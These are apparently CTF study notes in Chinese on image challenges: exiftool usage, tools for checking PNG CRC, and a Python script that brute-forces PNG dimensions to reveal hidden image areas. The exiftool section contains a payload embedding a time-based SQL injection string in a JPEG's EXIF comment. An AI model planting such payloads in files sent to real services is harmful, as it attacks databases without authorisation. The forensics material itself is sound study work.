1. picture
1.1 instrument
1.1.1 exiftool工具
参考资料:
1、图片EXIF信息查看与Exiftool使用 https://www.jianshu.com/p/d76457799de1
用于更新图片exif信息
payload:
exiftool -overwrite_original -comment="y1ng\"');select if(1,sleep(20),sleep(20));--+" y1ng.jpg
图虫查看器:https://exif.tuchong.com/
1.1.2 zsteg
1.1.3 tweakpng
这个工具可以查看图片的crc32值。
1.2 trick
1.2.1 高度隐写
#coding:utf-8
#python3
import zlib
import struct
#读文件
file = '1.png'
fr = open(file,'rb').read()
data = bytearray(fr[12:29])
crc32key = 0x75da3b3c
n = 4095 #理论上0xffffffff,但考虑到屏幕实际,0x0fff就差不多了
for w in range(n):#高和宽一起爆破
width = bytearray(struct.pack('>i', w))#q为8字节,i为4字节,h为2字节
for h in range(n):
height = bytearray(struct.pack('>i', h))
for x in range(4):
data[x+4] = width[x]
data[x+8] = height[x]
#print(data)
crc32result = zlib.crc32(data)
if crc32result == crc32key:
print(width,height)
#写文件
newpic = bytearray(fr)
for x in range(4):
newpic[x+16] = width[x]
newpic[x+20] = height[x]
fw = open(file+'.png','wb')#保存副本
fw.write(newpic)
fw.close
break
